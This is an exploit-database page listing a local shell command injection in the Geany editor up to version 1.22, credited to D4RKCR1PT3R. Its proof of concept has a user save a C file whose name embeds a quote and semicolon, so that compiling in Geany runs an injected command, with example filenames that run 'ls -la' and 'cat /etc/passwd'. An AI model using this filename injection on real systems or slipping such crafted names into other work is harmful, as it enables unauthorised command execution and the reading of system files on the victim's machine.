[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Geany <=1.22 Local Code injection Vulnerability

Author
D4RKCR1PT3R
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19924
Category
local exploits
Date add
09-12-2012
Platform
linux
Geany <=1.22 Local Shell Command injection Vulnerability
Since that A.B.C.D = Command that will be injected.
 
POC:
 
Create a C file, any file, click save, the filename you put: xpl.c";A.B.C.D"
 
Now compile the file using Geany (Build-> Compile) (Or the shortcut F8), injected code ready.
 
Examples:

xpl.c";ls -la"
xpl.c";cat /etc/passwd"

#  0day.today [2024-11-16]  #